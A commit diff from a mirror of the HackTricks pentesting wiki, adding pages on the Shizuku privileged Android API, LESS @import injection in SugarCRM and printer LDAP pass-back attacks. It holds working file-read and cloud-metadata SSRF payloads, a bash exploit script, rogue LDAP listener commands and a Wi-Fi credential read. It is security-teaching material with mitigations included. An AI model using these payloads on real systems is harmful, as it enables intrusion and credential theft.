maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Merge branch 'master' of github.com:HackTricks-wiki/hacktricks

Browse Source
This commit is contained in:
carlospolop 2025-07-15 18:58:40 +02:00
commit b3cf1aa280
9 changed files with 299 additions and 33 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

2
src/SUMMARY.md
View File

@ -337,6 +337,7 @@
- [Manual DeObfuscation](mobile-pentesting/android-app-pentesting/manual-deobfuscation.md)
- [React Native Application](mobile-pentesting/android-app-pentesting/react-native-application.md)
- [Reversing Native Libraries](mobile-pentesting/android-app-pentesting/reversing-native-libraries.md)
- [Shizuku Privileged Api](mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md)
- [Smali - Decompiling, Modifying, Compiling](mobile-pentesting/android-app-pentesting/smali-changes.md)
- [Spoofing your location in Play Store](mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md)
- [Tapjacking](mobile-pentesting/android-app-pentesting/tapjacking.md)
@ -544,6 +545,7 @@
# 🕸️ Pentesting Web
- [Less Code Injection Ssrf](pentesting-web/less-code-injection-ssrf.md)
- [Web Vulnerabilities Methodology](pentesting-web/web-vulnerabilities-methodology.md)
- [Reflecting Techniques - PoCs and Polygloths CheatSheet](pentesting-web/pocs-and-polygloths-cheatsheet/README.md)
- [Web Vulns List](pentesting-web/pocs-and-polygloths-cheatsheet/web-vulns-list.md)

4
src/generic-methodologies-and-resources/pentesting-wifi/enable-nexmon-monitor-and-injection-on-android.md
View File

@ -22,7 +22,7 @@ The same technique applies to any handset that has a publicly available NexMon p
* NexMon Magisk ZIP or self-compiled patch providing:
* `/system/lib*/libnexmon.so`
* `/system/xbin/nexutil`
* Hijacker ≥ 1.7 (arm/arm64) https://github.com/chrisk44/Hijacker
* Hijacker ≥ 1.7 (arm/arm64) [https://github.com/chrisk44/Hijacker](https://github.com/chrisk44/Hijacker)
* (Optional) Kali NetHunter or any Linux chroot where you intend to run wireless tools
---
@ -130,4 +130,4 @@ Performance on the Galaxy S10 is comparable to external USB NICs (~20 dBm TX, 2-
* [NexMon firmware patching framework](https://github.com/seemoo-lab/nexmon)
* [Hijacker (aircrack-ng GUI for Android)](https://github.com/chrisk44/Hijacker)
{{#include ../../banners/hacktricks-training.md}}
{{#include ../../banners/hacktricks-training.md}}

1
src/mobile-pentesting/android-app-pentesting/README.md
View File

@ -25,6 +25,7 @@ Sometimes it is interesting to **modify the application code** to access **hidde
## Other interesting tricks
- [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
- [Shizuku Privileged API (ADB-based non-root privileged access)](shizuku-privileged-api.md)
- **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/), [https://github.com/kiber-io/apkd](https://github.com/kiber-io/apkd)
- Extract APK from device:

127
src/mobile-pentesting/android-app-pentesting/shizuku-privileged-api.md Normal file
View File

@ -0,0 +1,127 @@
# Shizuku Privileged API
{{#include ../../banners/hacktricks-training.md}}
Shizuku is an opensource service that **spawns a privileged Java process using `app_process`** and exposes selected **Android system APIs over Binder**.
Because the process is launched with the same **`shell` UID capabilities that ADB uses**, any application (or terminal) that binds to the exported AIDL interface can perform many actions that normally require **`WRITE_SECURE_SETTINGS`, `INSTALL_PACKAGES`, file I/O inside `/data`,** etc. **without rooting the device**.
Typical use cases:
* Security auditing from an un-rooted handset
* Removing bloatware / debloating system apps
* Collecting logs, Wi-Fi keys, process and socket information for blue-team/DFIR
* Automating device configuration from custom apps or shell scripts
---
## 1. Starting the privileged service
`moe.shizuku.privileged.api` can be started in three different ways the resulting Binder service behaves the same in all of them.
### 1.1 Wireless ADB (Android 11+)
1. Enable **Developer Options ➜ Wireless debugging** and pair the device.
2. Inside the Shizuku app select **“Start via Wireless debugging”** and copy the pairing code.
3. The service survives until the next reboot (wireless-debugging sessions are cleared on boot).
### 1.2 USB / local ADB one-liner
```bash
adb push start.sh \
/storage/emulated/0/Android/data/moe.shizuku.privileged.api/
# spawn the privileged process
adb shell sh /storage/emulated/0/Android/data/moe.shizuku.privileged.api/start.sh
```
The same script can be executed over a **network ADB** connection (`adb connect <IP>:5555`).
### 1.3 Rooted devices
If the device is already rooted run:
```bash
su -c sh /data/adb/shizuku/start.sh
```
### 1.4 Verifying that it is running
```bash
adb shell dumpsys activity service moe.shizuku.privileged.api | head
```
A successful start returns `Running services (1)` together with the PID of the privileged process.
---
## 2. Binding from an application
Third-party apps only need the following inside their `AndroidManifest.xml`:
```xml
<uses-permission android:name="moe.shizuku.manager.permission.API"/>
```
At runtime they obtain the binder:
```java
IBinder binder = ShizukuProvider.getBinder();
IPackageManager pm = IPackageManager.Stub.asInterface(binder);
```
From this moment the app can invoke any method that the **`shell` user** may call for example :
```java
pm.installPackage(new Uri("file:///sdcard/app.apk"), null, 0, null);
Settings.Global.putInt(resolver, Settings.Global.ADB_ENABLED, 1);
```
A curated list of more than **170 Shizuku-enabled apps** is maintained at [awesome-shizuku](https://github.com/timschneeb/awesome-shizuku).
---
## 3. Rish elevated shell inside Termux
The Shizuku settings screen exposes **“Use Shizuku in terminal apps”**. Enabling it downloads *rish* (`/data/local/tmp/rish`).
```bash
pkg install wget
wget https://rikka.app/rish/latest -O rish && chmod +x rish
# start elevated shell (inherits the binder connection)
./rish
whoami # ➜ shell
id # uid=2000(shell) gid=2000(shell) groups=... context=u:r:shell:s0
```
### 3.1 Useful commands from the rish shell
* List running processes of a given package:
```bash
ps -A | grep com.facebook.katana
```
* Enumerate listening sockets and map them to packages (e.g. **CVE-2019-6447 ES File Explorer**):
```bash
netstat -tuln
for pid in $(lsof -nP -iTCP -sTCP:LISTEN -t); do
printf "%s -> %s\n" "$pid" "$(cat /proc/$pid/cmdline)";
done
```
* Dump every applications logs:
```bash
logcat -d | grep -iE "(error|exception)"
```
* Read stored Wi-Fi credentials (Android 11 +):
```bash
cat /data/misc/wifi/WifiConfigStore.xml | grep -i "<ConfigKey>"
```
* Bulk debloat (example):
```bash
pm uninstall --user 0 com.miui.weather2
```
---
## 4. Security considerations / detection
1. Shizuku needs **ADB debugging** privileges, therefore _Developer Options → USB/Wireless debugging_ must be **enabled**.
Organisations can block this through an MDM or via `settings put global development_settings_enabled 0`.
2. The service registers itself under the name `moe.shizuku.privileged.api`.
A simple `adb shell service list | grep shizuku` (or Endpoint Security rule) detects its presence.
3. Capabilities are limited to what the `shell` user can already do it is **not root**.
Sensitive APIs that require the `system` or `root` user are still inaccessible.
4. Sessions do **not survive a reboot** unless the device is rooted and Shizuku is configured as a startup daemon.
---
## 5. Mitigation
* Disable USB/Wireless debugging on production devices.
* Monitor for Binder services exposing `moe.shizuku.privileged.api`.
* Use SELinux policies (Android enterprise) to block the AIDL interface from unmanaged applications.
---
## References
- [Blog Shizuku: Unlocking Advanced Android Capabilities Without Root](https://www.mobile-hacker.com/2025/07/14/shizuku-unlocking-advanced-android-capabilities-without-root/)
- [Shizuku Official Documentation](https://shizuku.rikka.app/)
- [awesome-shizuku list of supported apps](https://github.com/timschneeb/awesome-shizuku)
- [rish shell (privileged reverse-adb shell)](https://github.com/RikkaApps/Shizuku/blob/master/RISH.md)
{{#include ../../banners/hacktricks-training.md}}

2
src/mobile-pentesting/ios-pentesting/ios-pentesting-without-jailbreak.md
View File

@ -106,7 +106,7 @@ Recent Frida releases (>=16) automatically handle pointer authentication and oth
### Automated dynamic analysis with MobSF (no jailbreak)
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【†L2-L3】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
[MobSF](https://mobsf.github.io/Mobile-Security-Framework-MobSF/) can instrument a dev-signed IPA on a real device using the same technique (`get_task_allow`) and provides a web UI with filesystem browser, traffic capture and Frida console【】. The quickest way is to run MobSF in Docker and then plug your iPhone via USB:
```bash
docker pull opensecurity/mobile-security-framework-mobsf:latest

2
src/network-services-pentesting/pentesting-telnet.md
View File

@ -139,4 +139,4 @@ After a shell is obtained remember that **TTYs are usually dumb**; upgrade with
{{#include /banners/hacktricks-training.md}}
{{#include ../banners/hacktricks-training.md}}

81
src/pentesting-web/less-code-injection-ssrf.md Normal file
View File

@ -0,0 +1,81 @@
# LESS Code Injection leading to SSRF & Local File Read
{{#include ../banners/hacktricks-training.md}}
## Overview
LESS is a popular CSS pre-processor that adds variables, mixins, functions and the powerful `@import` directive. During compilation the LESS engine will **fetch the resources referenced in `@import`** statements and embed ("inline") their contents into the resulting CSS when the `(inline)` option is used.
When an application concatenates **user-controlled input** into a string that is later parsed by the LESS compiler, an attacker can **inject arbitrary LESS code**. By abusing `@import (inline)` the attacker can force the server to retrieve:
* Local files via the `file://` protocol (information disclosure / Local File Inclusion).
* Remote resources on internal networks or cloud metadata services (SSRF).
This technique has been seen in real-world products such as **SugarCRM ≤ 14.0.0** (`/rest/v10/css/preview` endpoint).
## Exploitation
1. Identify a parameter that is directly embedded inside a stylesheet string processed by the LESS engine (e.g. `?lm=` in SugarCRM).
2. Close the current statement and inject new directives. The most common primitives are:
* `;` terminates the previous declaration.
* `}` closes the previous block (if required).
3. Use `@import (inline) '<URL>';` to read arbitrary resources.
4. Optionally inject a **marker** (`data:` URI) after the import to ease extraction of the fetched content from the compiled CSS.
### Local File Read
```
1; @import (inline) 'file:///etc/passwd';
@import (inline) 'data:text/plain,@@END@@'; //
```
The contents of `/etc/passwd` will appear in the HTTP response just before the `@@END@@` marker.
### SSRF Cloud Metadata
```
1; @import (inline) "http://169.254.169.254/latest/meta-data/iam/security-credentials/";
@import (inline) 'data:text/plain,@@END@@'; //
```
### Automated PoC (SugarCRM example)
```bash
#!/usr/bin/env bash
# Usage: ./exploit.sh http://target/sugarcrm/ /etc/passwd
TARGET="$1" # Base URL of SugarCRM instance
RESOURCE="$2" # file:// path or URL to fetch
INJ=$(python -c "import urllib.parse,sys;print(urllib.parse.quote_plus(\"1; @import (inline) '$RESOURCE'; @import (inline) 'data:text/plain,@@END@@';//\"))")
curl -sk "${TARGET}rest/v10/css/preview?baseUrl=1&lm=${INJ}" | \
sed -n 's/.*@@END@@\(.*\)/\1/p'
```
## Detection
* Look for dynamically generated `.less` or `.css` responses containing unsanitised query parameters.
* During code review, search for constructions like `"@media all { .preview { ... ${userInput} ... } }"` passed to LESS render functions.
* Exploit attempts often include `@import`, `(inline)`, `file://`, `http://169.254.169.254`, etc.
## Mitigations
* Do **not** pass untrusted data to the LESS compiler.
* If dynamic values are required, properly **escape**/sanitize them (e.g., restrict to numeric tokens, whitelists).
* Disable, when possible, the ability to use `(inline)` imports, or limit allowed protocols to `https`.
* Keep dependencies up to date SugarCRM patched this issue in versions 13.0.4 and 14.0.1.
## Real-World Cases
| Product | Vulnerable Endpoint | Impact |
|---------|--------------------|--------|
| SugarCRM ≤ 14.0.0 | `/rest/v10/css/preview?lm=` | Unauthenticated SSRF & local file read |
## References
* [SugarCRM ≤ 14.0.0 (css/preview) LESS Code Injection Vulnerability](https://karmainsecurity.com/KIS-2025-04)
* [SugarCRM Security Advisory SA-2024-059](https://support.sugarcrm.com/resources/security/sugarcrm-sa-2024-059/)
* [CVE-2024-58258](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-58258)
{{#include ../banners/hacktricks-training.md}}

6
src/pentesting-web/ssrf-server-side-request-forgery/ssrf-vulnerable-platforms.md
View File

@ -4,6 +4,12 @@
Check **[https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/](https://blog.assetnote.io/2021/01/13/blind-ssrf-chains/)**
- SugarCRM ≤ 14.0.0 LESS `@import` injection in `/rest/v10/css/preview` enables unauthenticated SSRF & local file read.
{{#ref}}
../less-code-injection-ssrf.md
{{#endref}}
{{#include ../../banners/hacktricks-training.md}}

107
src/windows-hardening/active-directory-methodology/ad-information-in-printers.md
View File

@ -2,60 +2,109 @@
{{#include ../../banners/hacktricks-training.md}}
There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials.\
This is because an attacker could **trick the printer to authenticate against a rouge LDAP server** (typically a `nc -vv -l -p 444` is enough) and to capture the printer **credentials on clear-text**.
There are several blogs in the Internet which **highlight the dangers of leaving printers configured with LDAP with default/weak** logon credentials. \
This is because an attacker could **trick the printer to authenticate against a rogue LDAP server** (typically a `nc -vv -l -p 389` or `slapd -d 2` is enough) and capture the printer **credentials in clear-text**.
Also, several printers will contains **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
Also, several printers will contain **logs with usernames** or could even be able to **download all usernames** from the Domain Controller.
All this **sensitive information** and the common **lack of security** makes printers very interesting for attackers.
Some blogs about the topic:
Some introductory blogs about the topic:
- [https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/](https://www.ceos3c.com/hacking/obtaining-domain-credentials-printer-netcat/)
- [https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856](https://medium.com/@nickvangilder/exploiting-multifunction-printers-during-a-penetration-test-engagement-28d3840d8856)
---
## Printer Configuration
- **Location**: The LDAP server list is found at: `Network > LDAP Setting > Setting Up LDAP`.
- **Behavior**: The interface allows LDAP server modifications without re-entering credentials, aiming for user convenience but posing security risks.
- **Exploit**: The exploit involves redirecting the LDAP server address to a controlled machine and leveraging the "Test Connection" feature to capture credentials.
- **Location**: The LDAP server list is usually found in the web interface (e.g. *Network ➜ LDAP Setting ➜ Setting Up LDAP*).
- **Behavior**: Many embedded web servers allow LDAP server modifications **without re-entering credentials** (usability feature → security risk).
- **Exploit**: Redirect the LDAP server address to an attacker-controlled host and use the *Test Connection* / *Address Book Sync* button to force the printer to bind to you.
---
## Capturing Credentials
**For more detailed steps, refer to the original [source](https://grimhacker.com/2018/03/09/just-a-printer/).**
### Method 1: Netcat Listener
A simple netcat listener might suffice:
### Method 1 Netcat Listener
```bash
sudo nc -k -v -l -p 386
sudo nc -k -v -l -p 389 # LDAPS → 636 (or 3269)
```
However, this method's success varies.
Small/old MFPs may send a simple *simple-bind* in clear-text that netcat can capture. Modern devices usually perform an anonymous query first and then attempt the bind, so results vary.
### Method 2: Full LDAP Server with Slapd
### Method 2 Full Rogue LDAP server (recommended)
A more reliable approach involves setting up a full LDAP server because the printer performs a null bind followed by a query before attempting credential binding.
1. **LDAP Server Setup**: The guide follows steps from [this source](https://www.server-world.info/en/note?os=Fedora_26&p=openldap).
2. **Key Steps**:
- Install OpenLDAP.
- Configure admin password.
- Import basic schemas.
- Set domain name on LDAP DB.
- Configure LDAP TLS.
3. **LDAP Service Execution**: Once set up, the LDAP service can be run using:
Because many devices will issue an anonymous search *before* authenticating, standing up a real LDAP daemon yields much more reliable results:
```bash
slapd -d 2
# Debian/Ubuntu example
sudo apt install slapd ldap-utils
sudo dpkg-reconfigure slapd # set any base-DN it will not be validated
# run slapd in foreground / debug 2
slapd -d 2 -h "ldap:///" # only LDAP, no LDAPS
```
When the printer performs its lookup you will see the clear-text credentials in the debug output.
> 💡 You can also use `impacket/examples/ldapd.py` (Python rogue LDAP) or `Responder -w -r -f` to harvest NTLMv2 hashes over LDAP/SMB.
---
## Recent Pass-Back Vulnerabilities (2024-2025)
Pass-back is *not* a theoretical issue vendors keep publishing advisories in 2024/2025 that exactly describe this attack class.
### Xerox VersaLink CVE-2024-12510 & CVE-2024-12511
Firmware ≤ 57.69.91 of Xerox VersaLink C70xx MFPs allowed an authenticated admin (or anyone when default creds remain) to:
* **CVE-2024-12510 LDAP pass-back**: change the LDAP server address and trigger a lookup, causing the device to leak the configured Windows credentials to the attacker-controlled host.
* **CVE-2024-12511 SMB/FTP pass-back**: identical issue via *scan-to-folder* destinations, leaking NetNTLMv2 or FTP clear-text creds.
A simple listener such as:
```bash
sudo nc -k -v -l -p 389 # capture LDAP bind
```
or a rogue SMB server (`impacket-smbserver`) is enough to harvest the credentials.
### Canon imageRUNNER / imageCLASS Advisory 20 May 2025
Canon confirmed a **SMTP/LDAP pass-back** weakness in dozens of Laser & MFP product lines. An attacker with admin access can modify the server configuration and retrieve the stored credentials for LDAP **or** SMTP (many orgs use a privileged account to allow scan-to-mail).
The vendor guidance explicitly recommends:
1. Updating to patched firmware as soon as available.
2. Using strong, unique admin passwords.
3. Avoiding privileged AD accounts for printer integration.
---
## Automated Enumeration / Exploitation Tools
| Tool | Purpose | Example |
|------|---------|---------|
| **PRET** (Printer Exploitation Toolkit) | PostScript/PJL/PCL abuse, file-system access, default-creds check, *SNMP discovery* | `python pret.py 192.168.1.50 pjl` |
| **Praeda** | Harvest configuration (including address books & LDAP creds) via HTTP/HTTPS | `perl praeda.pl -t 192.168.1.50` |
| **Responder / ntlmrelayx** | Capture & relay NetNTLM hashes from SMB/FTP pass-back | `responder -I eth0 -wrf` |
| **impacket-ldapd.py** | Lightweight rogue LDAP service to receive clear-text binds | `python ldapd.py -debug` |
---
## Hardening & Detection
1. **Patch / firmware-update** MFPs promptly (check vendor PSIRT bulletins).
2. **Least-Privilege Service Accounts** never use Domain Admin for LDAP/SMB/SMTP; restrict to *read-only* OU scopes.
3. **Restrict Management Access** place printer web/IPP/SNMP interfaces in a management VLAN or behind an ACL/VPN.
4. **Disable Unused Protocols** FTP, Telnet, raw-9100, older SSL ciphers.
5. **Enable Audit Logging** some devices can syslog LDAP/SMTP failures; correlate unexpected binds.
6. **Monitor for Clear-Text LDAP binds** on unusual sources (printers should normally talk only to DCs).
7. **SNMPv3 or disable SNMP** community `public` often leaks device & LDAP config.
---
## References
- [https://grimhacker.com/2018/03/09/just-a-printer/](https://grimhacker.com/2018/03/09/just-a-printer/)
- Rapid7. “Xerox VersaLink C7025 MFP Pass-Back Attack Vulnerabilities.” February 2025.
- Canon PSIRT. “Vulnerability Mitigation Against SMTP/LDAP Passback for Laser Printers and Small Office Multifunction Printers.” May 2025.
{{#include ../../banners/hacktricks-training.md}}